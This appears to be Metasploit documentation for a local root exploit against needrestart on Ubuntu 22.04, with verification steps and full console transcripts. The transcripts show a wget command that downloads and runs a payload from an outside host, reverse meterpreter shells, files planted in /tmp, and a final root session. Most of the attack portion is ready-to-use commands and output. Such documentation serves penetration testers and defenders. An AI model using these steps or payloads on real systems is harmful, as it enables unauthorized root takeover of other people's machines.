## Vulnerable Application Local attackers can execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable. Verified against Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1 Exploitation against vulnerable needrestart versions on Debian 12 and Fedora 39 were unsuccessful however install and run instructions are listed below. ### Debian Install: `apt-get install needrestart=3.6-4+deb12u1` Binary location: `/usr/sbin/needrestart` ### Fedora 39 Install: `dnf install needrestart-3.6-9.fc39.noarch` Binary location: `/usr/sbin/needrestart` ## Verification Steps 1. Install the application 2. Start msfconsole 3. Get an initial shell 4. Do: `use exploit/linux/local/ubuntu_needrestart_lpe` 5. Do: `set lhost ` 6. Do: `set lport ` 7. Do: `set session ` 8. Do: `run` 9. You should get a root shell. ## Options ### ListenerTimeout The maximum number of seconds to wait for session. Defaults to `90,000` which is 25hrs. ## Scenarios ### Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1 Gain initial shell ``` msf > use exploit/multi/script/web_delivery 998 run[*] Using configured payload python/meterpreter/reverse_tcp msf exploit(multi/script/web_delivery) > set target 7 target => 7 msf exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf exploit(multi/script/web_delivery) > set lhost 1.1.1.1 lhost => 1.1.1.1 msf exploit(multi/script/web_delivery) > set lport 4998 lport => 4998 msf exploit(multi/script/web_delivery) > set srvport 8998 srvport => 8998 msf exploit(multi/script/web_delivery) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf exploit(multi/script/web_delivery) > [*] Started reverse TCP handler on 1.1.1.1:4998 [*] Using URL: http://1.1.1.1:8998/dKtdkMS [*] Server started. [*] Run the following command on the target machine: wget -qO Ejq8lHli --no-check-certificate http://1.1.1.1:8998/dKtdkMS; chmod +x Ejq8lHli; ./Ejq8lHli& disown [*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes) [*] Sending stage (3045380 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4998 -> 2.2.2.2:52004) at 2024-11-22 12:07:55 -0500 msf exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: h00die meterpreter > background [*] Backgrounding session 1... ``` Priv Esc ``` msf exploit(multi/script/web_delivery) > use exploit/linux/local/ubuntu_needrestart_lpe [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp msf exploit(linux/local/ubuntu_needrestart_lpe) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf exploit(linux/local/ubuntu_needrestart_lpe) > set lhost 1.1.1.1 lhost => 1.1.1.1 msf exploit(linux/local/ubuntu_needrestart_lpe) > set lport 4977 lport => 4977 msf exploit(linux/local/ubuntu_needrestart_lpe) > set session 1 session => 1 msf exploit(linux/local/ubuntu_needrestart_lpe) > set verbose true verbose => true msf exploit(linux/local/ubuntu_needrestart_lpe) > run [*] Started reverse TCP handler on 1.1.1.1:4977 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Vulnerable needrestart version 3.5-5ubuntu2.1 detected on Ubuntu 22.04 [*] Writing '/tmp/.1K8Hy2tOtq' (250 bytes) ... [*] Uploading payload: /tmp/.1K8Hy2tOtq [*] Creating directory /tmp/importlib [*] /tmp/importlib created [*] Uploading c_stub: /tmp/importlib/__init__.so [*] Uploading py_script: /tmp/.FzzlJ [*] Launching exploit, and waiting for needrestart to run... ``` On the remote Ubuntu box run `sudo needrestart` ``` [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 2.2.2.2 [*] chown: changing ownership of '/tmp/.1K8Hy2tOtq': Operation not permitted [*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth: [*] [*] Traceback (most recent call last): [*] File "/usr/lib/python3.10/site.py", line 192, in addpackage [*] exec(line) [*] File "", line 1, in [*] ImportError: dynamic module does not define module export function (PyInit_importlib) [*] [*] Remainder of file ignored [*] ######################### [*] [*] Dont mind the error message above [*] [*] Waiting for needrestart to run... [*] Payload owned by: root [+] Deleted /tmp/.1K8Hy2tOtq [+] Deleted /tmp/.FzzlJ [+] Deleted /tmp/importlib [*] Meterpreter session 2 opened (1.1.1.1:4977 -> 2.2.2.2:57644) at 2024-11-22 12:08:28 -0500 meterpreter > meterpreter > getuid Server username: root ```